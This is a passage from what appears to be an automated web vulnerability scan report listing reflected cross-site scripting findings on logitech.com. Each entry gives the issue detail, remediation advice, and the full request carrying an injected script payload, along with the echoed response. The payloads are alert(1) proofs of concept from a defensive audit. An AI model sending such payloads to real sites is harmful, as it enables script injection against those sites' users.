Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','43480972</script><script>alert(1)</script>fdf704983fa/7288' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.227. http://www.logitech.com/en-us/434/7288 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e846e</script><script>alert(1)</script>9bd3403eac2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/434/7288e846e</script><script>alert(1)</script>9bd3403eac2 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','434/7288e846e</script><script>alert(1)</script>9bd3403eac2' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.228. http://www.logitech.com/en-us/434/7288 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b4e3"><script>alert(1)</script>75e334bcc3a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/434/72881b4e3"><script>alert(1)</script>75e334bcc3a HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="434/72881b4e3"><script>alert(1)</script>75e334bcc3a">
...[SNIP]...

1.229. http://www.logitech.com/en-us/434/7454 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93ff0"><script>alert(1)</script>7ce4cc8abb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us93ff0"><script>alert(1)</script>7ce4cc8abb6/434/7454 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us93ff0"><script>alert(1)</script>7ce4cc8abb6/434/7454">
...[SNIP]...

1.230. http://www.logitech.com/en-us/434/7454 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2423"%3b72cc3b99502 was submitted in the REST URL parameter 1. This input was echoed as d2423";72cc3b99502 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usd2423"%3b72cc3b99502/434/7454 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Set-Cookie: P_SEARCH_TEXT=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:32 GMT;path=/
Set-Cookie: LT_PRODUCT_ID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:32 GMT;path=/
Set-Cookie: CRID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:32 GMT;path=/
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-usd2423";72cc3b99502/434/7454";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.231. http://www.logitech.com/en-us/434/7454 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b86a</script><script>alert(1)</script>8eeb9ae98b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4b86a</script><script>alert(1)</script>8eeb9ae98b7/434/7454 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','4b86a</script><script>alert(1)</script>8eeb9ae98b7/434/7454' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.232. http://www.logitech.com/en-us/434/7454 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e89</script><script>alert(1)</script>88b82d92bac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/434d2e89</script><script>alert(1)</script>88b82d92bac/7454 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','434d2e89</script><script>alert(1)</script>88b82d92bac/7454' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.233. http://www.logitech.com/en-us/434/7454 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5984"><script>alert(1)</script>91ed86067f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/434f5984"><script>alert(1)</script>91ed86067f9/7454 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="434f5984"><script>alert(1)</script>91ed86067f9/7454">
...[SNIP]...

1.234. http://www.logitech.com/en-us/434/7454 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d72fc"><script>alert(1)</script>af62991ab8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/434/7454d72fc"><script>alert(1)</script>af62991ab8d HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="434/7454d72fc"><script>alert(1)</script>af62991ab8d">
...[SNIP]...

1.235. http://www.logitech.com/en-us/434/7454 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7454

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 744bf</script><script>alert(1)</script>855df44c795 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/434/7454744bf</script><script>alert(1)</script>855df44c795 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','434/7454744bf</script><script>alert(1)</script>855df44c795' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.236. http://www.logitech.com/en-us/437/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/437/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77462</script><script>alert(1)</script>5202e63abe1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /77462</script><script>alert(1)</script>5202e63abe1/437/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','77462</script><script>alert(1)</script>5202e63abe1/437' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dc
...[SNIP]...

1.237. http://www.logitech.com/en-us/437/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/437/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6932a"%3bc4c06e688d0 was submitted in the REST URL parameter 1. This input was echoed as 6932a";c4c06e688d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us6932a"%3bc4c06e688d0/437/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Apache
AK-control: no-store
Date: Fri, 12 Nov 2010 13:01:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us6932a";c4c06e688d0/437";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.238. http://www.logitech.com/en-us/437/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/437/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b70"><script>alert(1)</script>e328f9e7a0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us47b70"><script>alert(1)</script>e328f9e7a0f/437/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us47b70"><script>alert(1)</script>e328f9e7a0f/437">
...[SNIP]...

1.239. http://www.logitech.com/en-us/437/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/437/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6a6f"><script>alert(1)</script>a23e194a9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us/437c6a6f"><script>alert(1)</script>a23e194a9bd/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="437c6a6f"><script>alert(1)</script>a23e194a9bd">
...[SNIP]...

1.240. http://www.logitech.com/en-us/437/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/437/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47db6</script><script>alert(1)</script>c4103c39890 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/43747db6</script><script>alert(1)</script>c4103c39890/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','43747db6</script><script>alert(1)</script>c4103c39890' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.241. http://www.logitech.com/en-us/437/221 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/437/221

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac55e"><script>alert(1)</script>865702b8f76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-usac55e"><script>alert(1)</script>865702b8f76/437/221 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usac55e"><script>alert(1)</script>865702b8f76/437/221">
...[SNIP]...

1.242. http://www.logitech.com/en-us/437/221 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/437/221

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4813d"%3b172b7a2f7e3 was submitted in the REST URL parameter 1. This input was echoed as 4813d";172b7a2f7e3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us4813d"%3b172b7a2f7e3/437/221 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Set-Cookie: P_SEARCH_TEXT=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:01:47 GMT;path=/
Set-Cookie: LT_PRODUCT_ID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:01:47 GMT;path=/
Set-Cookie: CRID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:01:47 GMT;path=/
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us4813d";172b7a2f7e3/437/221";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.243. http://www.logitech.com/en-us/437/221 [REST URL parameter 1]